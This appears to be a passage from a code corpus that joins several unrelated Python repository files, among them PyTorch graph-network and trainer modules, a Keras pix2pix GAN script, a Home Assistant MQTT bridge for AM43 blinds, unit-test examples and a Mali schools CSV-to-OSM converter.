print("DATA JOINING COMPLETED")
print("File saved as:", outfile)
def main():
username, client_id, client_secret, redirect_uri = load_environment()
infile = "data/top_200_weekly.csv"
outfile = "data/top_200_features.csv"
get_audio_features(infile, outfile, username, client_id, client_secret, redirect_uri)
if __name__ == "__main__":
main()
```
#### File: Predict-Spotify-Top200/src/generate_lyrics.py
```python
from textgenrnn import textgenrnn
def main():
textgen = textgenrnn("data/textgenrnn_weights_4epochs.hdf5")
lyrics = textgen.generate(n=50, return_as_list=True)
for row in lyrics:
print(row)
if __name__ == "__main__":
main()
``` |
{
"source": "jokingbear/DM",
"score": 3
} |
#### File: plasma/modules/graph.py
```python
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as func
import pydot
from .commons import Identity
class GraphSequential(nn.Module):
def __init__(self, node_embedding, *args):
"""
:param node_embedding: embedding extracted from text, either numpy or torch tensor
:param args: additional torch module for transformation
"""
super().__init__()
if not torch.is_tensor(node_embedding):
node_embedding = torch.tensor(node_embedding, dtype=torch.float)
self.embedding = nn.Parameter(node_embedding, requires_grad=False)
self.sequential = nn.Sequential(*args)
def forward(self):
return self.sequential(self.embedding)
class GraphLinear(nn.Linear):
def __init__(self, in_channels, out_channels, correlation_matrix, bias=True):
"""
:param in_channels: size of input features
:param out_channels: size of output features
:param correlation_matrix: correlation matrix for information propagation
:param bias: whether to use bias
"""
super().__init__(in_channels, out_channels, bias)
assert isinstance(correlation_matrix, nn.Parameter), "correlation must be nn.Parameter"
self.correlation_matrix = correlation_matrix
def forward(self, x):
prop = torch.matmul(self.correlation_matrix, x)
return super().forward(prop)
class GCN(nn.Module):
def __init__(self, backbone, embeddings, correlations, backbone_features, ratio=0.5, sigmoid=True):
"""
:param embeddings: init embeddings for graph, either numpy or torch.tensor
:param correlations: normalized adjacency matrix in numpy
:param backbone_features: output features of extractor
"""
super().__init__()
self.backbone = backbone
correlations = torch.tensor(correlations, dtype=torch.float)
correlations = nn.Parameter(correlations, requires_grad=False)
bottleneck = int(np.round(backbone_features * ratio))
self.graph = GraphSequential(embeddings, *[
GraphLinear(embeddings.shape[-1], bottleneck, correlations),
nn.LeakyReLU(0.2, inplace=True),
GraphLinear(bottleneck, backbone_features, correlations),
])
self.out = nn.Sigmoid() if sigmoid else Identity()
self.bias = nn.Parameter(torch.zeros(embeddings.shape[0]), requires_grad=True)
self.backbone_features = backbone_features
def forward(self, x):
features = self.backbone(x)
embeddings = self.graph()
logits = func.linear(features, embeddings, self.bias)
result = self.out(logits)
return result
def export_linear(self):
"""
return new gcn with graph replaced with a linear layer
:return: nn.Sequential module
"""
linear = nn.Linear(self.backbone_features, self.graph.embedding.shape[0])
graph = self.graph.eval()
with torch.no_grad():
linear.weight.data = graph()
linear.bias.data = self.bias.data
model = nn.Sequential(*[
self.backbone,
linear,
self.out
])
return model
def get_label_correlation(df, columns, return_count=True):
"""
Calculate correlation of columns from data frame
:param df: pandas dataframe
:param columns: colunms to calculate correlation
:param return_count: return occurrence count
:return: correlation and counts
"""
counts = pd.DataFrame(columns=columns, index=columns)
for c1 in columns:
for c2 in columns:
counts.loc[c1, c2] = len(df[(df[c1] == 1) & (df[c2] == 1)])
correlation = counts / np.diag(counts)[:, np.newaxis]
if return_count:
return correlation, counts
else:
return correlation
def get_adjacency_matrix(smooth_corr, neighbor_ratio=0.2):
"""
Get adjacency matrix from smoothed correlation
:param smooth_corr: smoothed correlation matrix as dataframe
:param neighbor_ratio: how strong neighbor nodes affect main nodes
:return: adjacency matrix as dataframe
"""
identity = np.identity(smooth_corr.shape[0])
reweight = smooth_corr - identity
reweight = reweight * neighbor_ratio / (1 - neighbor_ratio) / (reweight.values.sum(axis=0, keepdims=True) + 1e-8)
reweight = reweight + identity
D = reweight.values.sum(axis=1) ** (-0.5)
D = np.diag(D)
normalized = D @ reweight.values.transpose() @ D
return pd.DataFrame(normalized, index=smooth_corr.index, columns=smooth_corr.columns)
def get_graph(corr, threshold=0.4):
"""
draw a pydot graph of correlation
:param corr: dataframe of correlation matrix
:param threshold: threshold to prune correlation
:return: pydot graph
"""
smooth_corr = corr >= threshold
graph = pydot.Dot(graph_type='digraph')
for c1 in corr.columns:
node1 = pydot.Node(c1)
graph.add_node(node1)
for c2 in corr.columns:
if c2 != c1:
node2 = pydot.Node(c2)
if smooth_corr.loc[c1, c2] != 0:
edge = pydot.Edge(node1, node2, label=np.round(corr.loc[c1, c2], decimals=2))
graph.add_edge(edge)
return graph
```
#### File: training/callbacks/base_class.py
```python
import torch.nn as nn
from ..trainers.base_trainer import BaseTrainer
class Callback:
def __init__(self):
self.trainer = None
self.models = None
self.optimizers = None
self.training_config = None
def on_train_begin(self, **train_configs):
pass
def on_train_end(self):
pass
def on_epoch_begin(self, epoch):
pass
def on_epoch_end(self, epoch, logs=None):
pass
def on_training_batch_begin(self, epoch, step, inputs, targets):
pass
def on_training_batch_end(self, epoch, step, inputs, targets, caches, logs=None):
pass
def on_validation_batch_begin(self, epoch, step, inputs, targets):
pass
def on_validation_batch_end(self, epoch, step, inputs, targets, caches):
pass
def set_trainer(self, trainer: BaseTrainer):
self.models = [m.module if isinstance(m, nn.DataParallel) else m for m in trainer.models]
self.optimizers = trainer.optimizers
self.trainer = trainer
def extra_repr(self):
return ""
def __repr__(self):
return f"{type(self).__name__}({self.extra_repr()})"
def __str__(self):
return repr(self)
```
#### File: training/trainers/base_trainer.py
```python
from abc import abstractmethod
from itertools import count
from typing import List, Tuple
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from ..utils import get_progress, eval_modules
class BaseTrainer:
def __init__(self, models: List[nn.Module], optimizers, loss: nn.Module, metrics=None):
self.models = models
self.optimizers = optimizers
self.loss = loss
self.metrics = metrics or []
self.training = True
def fit(self, train_loader, valid_loader=None, callbacks=None, start_epoch=1):
assert start_epoch > 0, "start epoch must be positive"
callbacks = callbacks or []
[c.set_trainer(self) for c in callbacks]
train_configs = {
"train_loader": train_loader,
"test_loader": valid_loader,
"start_epoch": start_epoch,
}
[c.on_train_begin(**train_configs) for c in callbacks]
try:
for e in count(start=start_epoch):
print(f"epoch {e}")
[c.on_epoch_begin(e) for c in callbacks]
train_logs = self._train_one_epoch(e, train_loader, callbacks)
val_logs = {}
if valid_loader is not None:
val_logs = self._evaluate_one_epoch(valid_loader, e, callbacks)
logs = {**train_logs, **val_logs}
[c.on_epoch_end(e, logs) for c in callbacks]
if not self.training:
break
[c.on_train_end() for c in callbacks]
except Exception as e:
with open("trainer_error.txt", "w+") as handle:
handle.write(str(e))
raise
def _train_one_epoch(self, epoch, train_loader, callbacks):
running_metrics = np.zeros([])
with get_progress(total=len(train_loader), desc="train") as pbar:
for i, data in enumerate(train_loader):
inputs, targets = self._extract_data(data)
[c.on_training_batch_begin(epoch, i, inputs, targets) for c in callbacks]
[m.train().zero_grad() for m in self.models]
loss_dict, caches = self._train_one_batch(inputs, targets)
with torch.no_grad():
measures = self._get_train_measures(inputs, targets, loss_dict, caches)
measures = pd.Series(measures)
running_metrics = running_metrics + measures
logs = measures
[c.on_training_batch_end(epoch, i, inputs, targets, caches, logs) for c in callbacks]
logs = logs.copy()
logs.update(running_metrics / (i + 1))
pbar.set_postfix(logs)
pbar.update()
return logs
def _evaluate_one_epoch(self, test_loader, epoch=0, callbacks=()):
eval_caches = []
with get_progress(total=len(test_loader), desc="eval") as pbar, eval_modules(*self.models):
for i, data in enumerate(test_loader):
inputs, targets = self._extract_data(data)
[c.on_validation_batch_begin(epoch, i, inputs, targets) for c in callbacks]
caches = self._get_eval_cache(inputs, targets)
eval_caches.append(caches)
pbar.update()
[c.on_validation_batch_end(epoch, i, inputs, targets, caches) for c in callbacks]
if torch.is_tensor(eval_caches[0]):
eval_caches = torch.cat(eval_caches, dim=0)
else:
n_pred = len(eval_caches[0])
eval_caches = [torch.cat([c[i] for c in eval_caches], dim=0) for i in range(n_pred)]
logs = self._get_eval_logs(eval_caches)
pbar.set_postfix(logs)
return logs
@abstractmethod
def _extract_data(self, batch_data):
pass
@abstractmethod
def _train_one_batch(self, inputs, targets) -> Tuple[dict, object]:
pass
@abstractmethod
def _get_train_measures(self, inputs, targets, loss_dict, cache) -> dict:
pass
@abstractmethod
def _get_eval_cache(self, inputs, targets):
pass
@abstractmethod
def _get_eval_logs(self, eval_caches) -> dict:
pass
def extra_repr(self):
return ""
def __repr__(self):
return f"{type(self).__name__}({self.extra_repr()})"
def __str__(self):
return repr(self)
``` |
{
"source": "jokk33/IM906",
"score": 2
} |
#### File: jokk33/IM906/cgan for shoes and cityscapes.py
```python
import numpy as np
import pandas as pd
import scipy
from glob import glob
import numpy as np
import matplotlib.pyplot as plt
from skimage import transform
from __future__ import print_function, division
from keras.layers import Input, Dense, Reshape, Flatten, Dropout, Concatenate
from keras.layers import BatchNormalization, Activation, ZeroPadding2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
import datetime
import sys
import os
from imageio import imread
print(os.listdir("../input"))
data_type = "train" if not is_val else "val"
path = glob('../input/%s/%s/%s/*' % (dataset_name,dataset_name, data_type))
batch_images = np.random.choice(path, size=batch_size)
img_res=(128,128)
imgs_A = []
imgs_B = []
for img_path in batch_images:
img = imread(img_path)
h, w, _ = img.shape
_w = int(w/2)
# because in the edges2shoes and maps dataset the input image comes before the ground truth.
if (dataset_name=="edges2shoes" or dataset_name=="maps"):
img_A, img_B = img[:, _w:, :],img[:, :_w, :]
else:
img_A, img_B = img[:, :_w, :], img[:, _w:, :]
# decreasing the resolution
img_A = transform.resize(img_A, img_res) #Ground Truth image
img_B = transform.resize(img_B, img_res) #Input image
# If training => do random flip , this is a trick to avoid overfitting
if not is_val and np.random.random() < 0.5:
img_A = np.fliplr(img_A)
img_B = np.fliplr(img_B)
imgs_A.append(img_A)
imgs_B.append(img_B)
#normalizing the images
imgs_A = np.array(imgs_A)/127.5 - 1.
imgs_B = np.array(imgs_B)/127.5 - 1.
return imgs_A, imgs_B
data_type = "train" if not is_val else "val"
path = glob('../input/%s/%s/%s/*' % (dataset_name,dataset_name, data_type))
n_batches=batch_size
img_res=(128,128)
for i in range(n_batches-1):
batch = path[i*batch_size:(i+1)*batch_size]
imgs_A, imgs_B = [], []
for img in batch:
img = imread(img)
h, w, _ = img.shape
half_w = int(w/2)
# because in the edges2shoes and maps dataset the input image comes before the ground truth.
if (dataset_name=="edges2shoes"or dataset_name=="maps"):
img_A, img_B = img[:, half_w:, :],img[:, :half_w, :]
else:
img_A, img_B = img[:, :half_w, :], img[:, half_w:, :]
img_A = transform.resize(img_A, img_res)#Ground truth image
img_B = transform.resize(img_B, img_res)# input image
# when training => do random flip , this is a trick to avoid overfitting
if not is_val and np.random.random() > 0.5:
img_A = np.fliplr(img_A)
img_B = np.fliplr(img_B)
imgs_A.append(img_A)
imgs_B.append(img_B)
# normalizing the images
imgs_A = np.array(imgs_A)/127.5 - 1.
imgs_B = np.array(imgs_B)/127.5 - 1.
yield imgs_A, imgs_B
def imread(path):
return scipy.misc.imread(path, mode='RGB').astype(np.float)
"""U-Net Generator"""
def conv2d(layer_input, filters, f_size=4, bn=True):
"""Layers used during downsampling"""
d = Conv2D(filters, kernel_size=f_size, strides=2, padding='same')(layer_input)
d = LeakyReLU(alpha=0.2)(d)
if bn:
d = BatchNormalization(momentum=0.8)(d)
return d
def deconv2d(layer_input, skip_input, filters, f_size=4, dropout_rate=0):
"""Layers used during upsampling"""
u = UpSampling2D(size=2)(layer_input)
u = Conv2D(filters, kernel_size=f_size, strides=1, padding='same', activation='relu')(u)
if dropout_rate:
u = Dropout(dropout_rate)(u)
u = BatchNormalization(momentum=0.8)(u)
u = Concatenate()([u, skip_input]) #skip connection
return u
# Image input
d0 = Input(shape=img_shape)
# Downsampling
d1 = conv2d(d0, gf, bn=False)
d2 = conv2d(d1, gf*2)
d3 = conv2d(d2, gf*4)
d4 = conv2d(d3, gf*8)
d5 = conv2d(d4, gf*8)
d6 = conv2d(d5, gf*8)
d7 = conv2d(d6, gf*8)
# Upsampling
u1 = deconv2d(d7, d6, gf*8)
u2 = deconv2d(u1, d5, gf*8)
u3 = deconv2d(u2, d4, gf*8)
u4 = deconv2d(u3, d3, gf*4)
u5 = deconv2d(u4, d2, gf*2)
u6 = deconv2d(u5, d1, gf)
u7 = UpSampling2D(size=2)(u6)
output_img = Conv2D(channels, kernel_size=4, strides=1, padding='same', activation='tanh')(u7)
return Model(d0, output_img)
def build_discriminator():
# a small function to make one layer of the discriminator
def d_layer(layer_input, filters, f_size=4, bn=True):
"""Discriminator layer"""
d = Conv2D(filters, kernel_size=f_size, strides=2, padding='same')(layer_input)
d = LeakyReLU(alpha=0.2)(d)
if bn:
d = BatchNormalization(momentum=0.8)(d)
return d
img_A = Input(shape=img_shape)
img_B = Input(shape=img_shape)
# Concatenate image and conditioning image by channels to produce input
combined_imgs = Concatenate(axis=-1)([img_A, img_B])
d1 = d_layer(combined_imgs, df, bn=False)
d2 = d_layer(d1, df*2)
d3 = d_layer(d2, df*4)
d4 = d_layer(d3, df*8)
validity = Conv2D(1, kernel_size=4, strides=1, padding='same')(d4)
return Model([img_A, img_B], validity)
img_rows = 128
img_cols = 128
channels = 3
img_shape = (img_rows, img_cols, channels)
# Calculate output shape of D (PatchGAN)
patch = int(img_rows / 2**4)
disc_patch = (patch, patch, 1)
# Number of filters in the first layer of G and D
gf = 64
df = 64
optimizer = Adam(0.0002, 0.5)
# Build and compile the discriminator
discriminator = build_discriminator()
discriminator.compile(loss='mse',
optimizer=optimizer,
metrics=['accuracy'])
# Build the generator
generator = build_generator()
# Input images and their conditioning images
img_A = Input(shape=img_shape)
img_B = Input(shape=img_shape)
# By conditioning on B generate a fake version of A
fake_A = generator(img_B)
# For the combined model we will only train the generator
discriminator.trainable = False
# Discriminators determines validity of translated images / condition pairs
valid = discriminator([fake_A, img_B])
combined = Model(inputs=[img_A, img_B], outputs=[valid, fake_A])
combined.compile(loss=['mse', 'mae'],
loss_weights=[1, 100],
optimizer=optimizer)
r, c = 3, 3
imgs_A, imgs_B = load_data(dataset_name,batch_size=3, is_val=True)
fake_A = generator.predict(imgs_B)
gen_imgs = np.concatenate([imgs_B, fake_A, imgs_A])
# Rescale images 0 - 1
gen_imgs = 0.5 * gen_imgs + 0.5
titles = ['Input', 'Output', 'Ground Truth']
fig, axs = plt.subplots(r, c)
cnt = 0
for i in range(r):
for j in range(c):
axs[i,j].imshow(gen_imgs[cnt])
axs[i, j].set_title(titles[i])
axs[i,j].axis('off')
cnt += 1
plt.show()
plt.close()
def train( dataset_name,epochs, batch_size=1, show_interval=10):
start_time = datetime.datetime.now()
# Adversarial loss ground truths
valid = np.ones((batch_size,) + disc_patch)
fake = np.zeros((batch_size,) + disc_patch)
for epoch in range(epochs):
for batch_i, (imgs_A, imgs_B) in enumerate(load_batch(dataset_name,batch_size)):
# Train Discriminator
# Condition on B and generate a translated version
fake_A = generator.predict(imgs_B)
# Train the discriminators (original images = real / generated = Fake)
d_loss_real = discriminator.train_on_batch([imgs_A, imgs_B], valid)
d_loss_fake = discriminator.train_on_batch([fake_A, imgs_B], fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# Train Generator
g_loss = combined.train_on_batch([imgs_A, imgs_B], [valid, imgs_A])
elapsed_time = datetime.datetime.now() - start_time
# Plot the progress
if epoch%10==0:
print ("[Epoch %d/%d] [D loss: %f, acc: %3d%%] [G loss: %f] time: %s" % (epoch, epochs,
d_loss[0], 100*d_loss[1],
g_loss[0],
elapsed_time))
# If at show interval => show generated image samples
if epoch % show_interval == 0:
show_images(dataset_name,epoch, batch_i)
train("cityscapes",epochs=10, batch_size=32, show_interval=10)
#can change epochs to 10/20/50/80
train("edges2shoes",epochs=10, batch_size=32, show_interval=5)
#can change epochs to 10/20/50/80
``` |
{
"source": "jokkebk/livecoding",
"score": 3
} |
#### File: livecoding/Euler16-20/p17.py
```python
def write(n):
small = 'zero one two three four five six seven eight nine \
ten eleven twelve thirteen fourteen fifteen sixteen \
seventeen eighteen nineteen'.split()
tens = 'twenty thirty fourty fifty sixty seventy eighty ninety'.split()
if n<20:
return small[n]
elif n<100:
s = tens[n//10 - 2]
if n%10:
return "%s-%s" % (s, write(n%10))
else:
return s
elif n<1000:
s = "%s hundred" % small[n//100]
return "%s and %s" % (s, write(n%100)) if n % 100 else s
# Python: 'abc' if condition else 'xyz'
# C/C++ etc.:condition ? 'abc' : 'xyz'
else: return 'one thousand'
s = 0
for i in range(1,1001):
s += sum(1 for ch in write(i) if ch >= 'a' and ch <= 'z')
print(s)
``` |
{
"source": "jokke-ilujo/hass-am43-gw",
"score": 2
} |
#### File: hass_am43/services/mqtt_service.py
```python
import am43
import json
from oslo_config import cfg
from twisted.application.internet import ClientService, backoffPolicy
from twisted.internet import task
from twisted.internet.defer import inlineCallbacks, DeferredList
from hass_am43 import logging
CONF = cfg.CONF
log = logging.log
class MQTTService(ClientService):
def __init__(self, endpoint, factory, broker, credentials):
ClientService.__init__(self, endpoint, factory,
retryPolicy=backoffPolicy())
self.broker = broker
if credentials:
self.credentials = credentials
else:
self.credentials = {}
self.blinds = {}
for am43_b in CONF.am43_blinds:
self.blinds[am43_b] = {'mac': getattr(CONF, am43_b).mac_address,
'location': getattr(CONF, am43_b).location}
self.blinds_config = []
for bid, blind in self.blinds.items():
b_conf = {'name': "AM43 Blind",
'device_class': "blind",
'object_id': bid,
'unique_id': self.blinds[bid]['mac'].replace(':', ''),
'platform': "mqtt",
'qos': 2,
'~': "homeassistant/cover/{}".format(bid),
'cmd_t': "~/set",
'set_pos_t': "~/set_position",
'pos_t': "~/position",
'position_open': 0,
'position_closed': 100,
'payload_open': "OPEN",
'payload_close': "CLOSE",
'payload_stop': ''}
self.blinds_config.append(b_conf)
def _log_failure(failure):
log.debug("reported {message}", message=failure.getErrorMessage())
return failure
def _log_all_pub(*args):
log.debug("all publishing complete args={args!r}", args=args)
def startService(self):
log.info("starting MQTT Client Service")
# whenConnected() inherited from ClientService
self.whenConnected().addCallback(self.connect_to_broker)
ClientService.startService(self)
self.task.start(self.interval)
self.conf_task.start(self.interval)
@inlineCallbacks
def connect_to_broker(self, protocol):
'''
Connect to MQTT broker
'''
self.protocol = protocol
self.protocol.onPublish = self.on_publish
self.protocol.onDisconnection = self.on_disconnection
self.protocol.setWindowSize(1)
self.interval = CONF.polling_interval
self.task = task.LoopingCall(self.publish_positions,
CONF.am43_blinds)
self.conf_task = task.LoopingCall(self.publish_config)
try:
yield self.protocol.connect("TwistedMQTT-hass-am43",
keepalive=60,
**self.credentials)
yield self.subscribe()
except Exception as e:
log.error("Connecting to {broker} raised {excp!s}",
broker=self.broker, excp=e)
else:
log.info("Connected and subscribed to {broker}",
broker=self.broker)
def subscribe(self):
def _logGrantedQoS(value):
log.debug("response {value!r}", value=value)
return True
def _logAll(*args):
log.debug("all subscriptions complete args={args!r}", args=args)
d = []
for b_conf in self.blinds_config:
sub = self.protocol.subscribe(b_conf['~'] +
b_conf['set_pos_t'][1:], 2)
sub.addCallbacks(_logGrantedQoS, self._log_failure)
d.append(sub)
sub = self.protocol.subscribe(b_conf['~'] +
b_conf['cmd_t'][1:], 2)
sub.addCallbacks(_logGrantedQoS, self._log_failure)
d.append(sub)
dlist = DeferredList(d, consumeErrors=True)
dlist.addCallback(_logAll)
return dlist
def publish_config(self):
log.debug(" >< Sending config messages >< ")
cl = []
for b_conf in self.blinds_config:
conf_pub = self.protocol.publish(
topic=b_conf['~'] + '/config',
qos=b_conf['qos'],
message=json.dumps(b_conf)
)
conf_pub.addErrback(self._log_failure)
dlist = DeferredList(cl, consumeErrors=True)
dlist.addCallback(self._log_all_pub)
return dlist
def publish_positions(self, keys=[]):
log.debug(" >< Collecting blinds states >< ")
blinds_states = {}
for key in keys:
log.debug((" >< Publish positions >< key:{key} "
"mac:{mac}").format(key=key,
mac=self.blinds[key]['mac']))
blind_engine = am43.search(self.blinds[key]['mac'])
blinds_states[key] = blind_engine.get_properties()
else:
return
log.debug(" >< Publishing positions >< ")
states_list = []
for key, states in blinds_states.items():
b_conf = next(item for item in self.blinds_config if
item['object_id'] == key)
topic = b_conf['~'] + b_conf['pos_t'][1:]
states_list.append(
self.protocol.publish(topic=topic,
qos=b_conf['qos'],
message=states['position'])
)
states_list[-1].addErrback(self._log_failure)
dlist = DeferredList(states_list, consumeErrors=True)
dlist.addCallback(self._log_all_pub)
return dlist
def on_publish(self, topic, payload, qos, dup, retain, msgId):
'''
Callback Receiving messages from publisher
'''
log.debug("topic={topic} msg={payload}".format(topic=topic,
payload=payload))
blind = next((item for item in self.blinds_config if
item['~'] + item['set_pos_t'][1:] == topic), False)
if blind:
blind_engine = am43.search(self.blinds[blind['object_id']]['mac'])
else:
blind = next((item for item in self.blinds_config if
item['~'] + item['cmd_t'][1:] == topic), False)
if blind:
blind_engine = am43.search(
self.blinds[blind['object_id']]['mac'])
if payload == "OPEN":
blind_engine.set_postion(pecentage=0)
else:
blind_engine.set_postion(pecentage=100)
def on_disconnection(self, reason):
'''
get notfied of disconnections
and get a deferred for a new protocol object (next retry)
'''
log.debug(" >< Connection was lost ! ><, reason={r}", r=reason)
self.whenConnected().addCallback(self.connectToBroker)
``` |
{
"source": "jokki/python_unit_test_examples",
"score": 2
} |
#### File: jokki/python_unit_test_examples/static_class.py
```python
class StaticClass():
def staticMethod():
pass
def staticMethodWithStringArg(s):
pass
def staticMethodWithNumArg(s):
pass
```
#### File: python_unit_test_examples/test/test_exception.py
```python
import unittest
from unittest.mock import Mock, patch, MagicMock
import runme
class TestException(unittest.TestCase):
def setUp(self):
## Whatever goes here gets run before every test case
pass
def tearDown(self):
## Whatever goes here gets run after every test case
pass
def test_exception(self):
with self.assertRaises(runme.RunMeException) as context:
runme.functionThatThrowsException()
self.assertTrue('This is an exception' in str(context.exception))
if __name__ == '__main__':
unittest.main()
```
#### File: python_unit_test_examples/test/test_instance_methods.py
```python
import unittest
from unittest.mock import Mock, patch, MagicMock
import runme
class TestInstanceMethods(unittest.TestCase):
def setUp(self):
## Whatever goes here gets run before every test case
pass
def tearDown(self):
## Whatever goes here gets run after every test case
pass
@patch('runme.InstanceClass')
def test_constructor(self, mockInstanceClass):
runme.useInstanceClass()
mockInstanceClass.assert_called()
@patch('runme.InstanceClass')
def test_callInstanceMethodUsingCustomMockClass(self, mockInstanceClass):
class CustomMockClass():
def __init__(self):
self.someInstanceMethodCalled = False
def someInstanceMethod(self, arg):
self.someInstanceMethodCalled = True
return "Custom mock object!"
def multiArgInstanceMethod(self, a, b):
pass
def isCalled(self):
return self.someInstanceMethodCalled
customMock = CustomMockClass()
mockInstanceClass.return_value = customMock
runme.useInstanceClass()
self.assertTrue(customMock.isCalled())
@patch('runme.InstanceClass.someInstanceMethod')
def test_instanceMethodReturnValue(self, mockInstanceMethod):
mockMessage = "Mocked method!"
mockInstanceMethod.return_value = mockMessage
result = runme.useInstanceClass()
self.assertEqual(result, mockMessage, "Unexpected result!")
@patch('runme.InstanceClass.someInstanceMethod')
def test_instanceMethodArg(self, mockInstanceMethod):
dontCare = "Don't care"
mockInstanceMethod.return_value = dontCare
result = runme.useInstanceClass()
mockInstanceMethod.assert_called_once_with(99)
@patch('runme.InstanceClass.multiArgInstanceMethod')
def test_multiArgInstanceMethodArgs(self, mockMultiArgInstanceMethod):
dontCare = "Don't care"
mockMultiArgInstanceMethod.return_value = dontCare
result = runme.useInstanceClass()
mockMultiArgInstanceMethod.assert_called_once_with(1, 2)
@patch('runme.InstanceClass.getNext')
def test_multiCall(self, mockGetNext):
mockGetNext.side_effect = [4, 5, 6]
self.assertEqual(15, runme.addStuff(), "Wrong result!")
if __name__ == '__main__':
unittest.main()
```
#### File: python_unit_test_examples/test/test_multiple.py
```python
import unittest
from unittest.mock import Mock, patch, MagicMock
import runme
class TestMultipleMockObjects(unittest.TestCase):
def setUp(self):
## Whatever goes here gets run before every test case
pass
def tearDown(self):
## Whatever goes here gets run after every test case
pass
# Note that
#
# "When you nest patch decorators the mocks are passed in to
# the decorated function in the same order they applied (the normal python
# order that decorators are applied). This means from the bottom up..."
#
# https://docs.python.org/3/library/unittest.mock.html
@patch('runme.StaticClass.staticMethodWithStringArg')
@patch('runme.InstanceClass')
def test_callStaticMethodWithStringArg(self, mockInstanceClass, mockStaticMethodWithStringArg):
instanceMock = Mock()
mockInstanceClass.return_value = instanceMock
runme.useBoth()
mockStaticMethodWithStringArg.assert_called_once_with("Hello Another World!")
instanceMock.someInstanceMethod.assert_called_once_with(11)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jokkolabs/mali_schools",
"score": 3
} |
#### File: jokkolabs/mali_schools/csv2osm.py
```python
from __future__ import (unicode_literals, absolute_import,
division, print_function)
import sys
import os
import re
import datetime
import unicodecsv as csv
xml_head = ('<?xml version="1.0" encoding="UTF-8"?>\n'
'<osm version="0.6" generator="csv2osm.py">\n'
'<bounds minlat="{minlat}" minlon="{minlon}" '
'maxlat="{maxlat}" maxlon="{maxlon}"/>\n')
xml_tail = '</osm>\n'
node_tmpl = '<node id="{id}" version="1" changeset="{id}" ' \
'lat="{lat}" lon="{lon}" user="Open Data Mali" ' \
'uid="2306601" visible="true" timestamp="{timestamp}">\n' \
'{tags}\n' \
'</node>'
def getTag(key, value):
return '<tag k="{key}" v="{value}"/>'.format(key=key, value=value)
def getTags(**tags):
return "\n".join([getTag(key, value) for key, value in tags.items()])
def getTimestamp():
return datetime.datetime.now().isoformat().split('.')[0] + 'Z'
def yesno(cond):
return 'yes' if cond else 'no'
def clean(s):
return s.strip().replace('"', "'").replace('¨', 'è')
def cleanName(s):
s = clean(s)
def _cycle2(s):
marker = "[2ème C]"
patts = ["SECOND CYCLE",
"SECOND/ CYCLE",
"SECOND /CYCLE",
"SECOND-CYCLE",
"Second Cycle",
"DEUXIEME CYCLE",
"SEOND CYCLE",
"SEGOND CYCLE",
"2EM CYCLE",
"2è CYCLE",
"2 ème CYCLE",
"2EME CYCLE",
"2ème Cycle",
"2ème CYCLE",
"2 EME CYCLE",
"2è CYCEL",
"2e Cycle",
"2 CYCLE",
"2EM Cycle",
"2E CYCLE",
"2EME CYCLE",
"2 Cycle",
"2ème cycle",
"2éme CYCLE",
"2ème CYCLE",
"2 ème Cycle",
"2 ème cycle",
"2è cYCLE",
"2è CYCLE",
"2e cycle",
"2èmr CYCLE",
"2èmé Cycle",
"2èME CYCLE",
"2 è CYCLE",
"2em Cycle",
"2 è CYCLE",
"2eme cycle",
"2ième cycle",
"2è cycle",
"2CYCLE",
"2éme C.",
"2ème C",
"2eme C",
"2EME C",
"2ème C",
"2ème c",
"[[2ème C]]",
"2èmeC",
"2 ème",
"2e SC",
"2E c",
"2 è c",
"2 e C",
"2 E C",
"2è SC",
"2E C",
"2e C",
"2e C",
"2è C",
"2é C",
"2° C",
"2e C",
"2E C",
"2 è C",
"2 C",
"2°C",
"2èC",
"2eC",
"2Èc",
"2EC",
"2E",
"2C",
"2c",
"2é",
]
for index in range(0, len(patts)):
patt = patts[index]
if marker in s:
return s
s = s.replace(patt, marker)
return s
def _cycle1(s):
marker = "[1er C]"
patts = ["PREMIER CYCLE",
"PREMIER CYCLE",
"I ER CYCLE",
"I er CYCLE",
"[1er C]cycle",
"Ier Cycle",
"Ier CYCLE",
"1er CYCLE",
"1er CYCLE",
"1ER CYCLE",
"1er cycle",
"1èr CYCLE",
"1ERE CYCLE",
"1 e CYCLE",
"1 ER CYCLE",
"1 er cycle",
"1° CYCLE",
"1e CYCLE",
"1E CYLCE",
"1ér cycle",
"1e CYCLE",
"1° CYCLE",
"1ER CYCLE",
"1 CYCLE",
"1r Cycle",
"1ercycle",
"1ère cycle /",
"1cycle/",
"1Cycle",
"1 cycle",
"(1 er C)",
"1 er C",
"1er C",
"1ER C",
"1erC.",
"1erC",
"1ER C",
"1e C",
"1° C",
"1°C",
"1 C",
"1eC",
"1èC",
"1er",
"1C",
"1°",
]
for index in range(0, len(patts)):
patt = patts[index]
if marker in s:
return s
s = s.replace(patt, marker)
return s
def _franco(s):
return s.replace("<NAME>", "franco-arabe")
def _ecole(s):
return s.replace("ECOLE PRIVEE", "École privée") \
.replace("Ecole privée", "École privée") \
.replace("ECOLE DE BASE PRIVEE", "École de base privée") \
.replace("ECOLE PRIVE", "École privée") \
.replace("ECOL FOND. PRIVEE", "École fondamentale privée") \
.replace("Ecole", "École") \
.replace("ECOLES", "École") \
.replace("ECOLE", "École") \
.replace("COMMUNAUTAIRE", "communautaire") \
.replace("COOPERATIVE", "coopérative") \
.replace("PUBLIQUE", "publique") \
.replace("CATHOLIQUE", "catholique") \
.replace("FRANCO-ARABE", "franco-arabe") \
.replace("FONDAMENTALE DE", "fondamentale de") \
.replace("FONDAMENTALE", "fondamentale") \
.replace("FONDAMENTAL", "fondamentale") \
.replace("FOND ", "fondamentale ") \
.replace("MOBILE", "mobile") \
.replace("DES SOURDS-MUETS DE", "des sourds-muets de") \
.replace("SPECIALE", "spéciale") \
.replace(" DE ", " de ") \
.replace("PRIVEE", "École privée") \
.replace("PRIVE", "École privée")
def _special(s):
patts = [
(" (YOROSSO[2ème C])", ""),
]
for index in range(0, len(patts)):
patt = patts[index]
s = s.replace(patt[0], patt[1])
return s
def _spaces(s):
return re.sub(r'\s+', " ", s).replace("( ", "(").replace(" )", ")")
def _cap(s):
return s
s = _cycle1(s)
s = _cycle2(s)
s = _special(s)
s = _franco(s)
s = _spaces(s)
s = _ecole(s)
s = _cap(s)
return s
def getNode(entry, lnum):
# Schools are `1er cycle` or `2ème cycle`
cycle = 1 if entry.get('CYCLE') == "1er cycle" else 2
has_latrines = entry.get('PRESENCE_LATRINES') == '1'
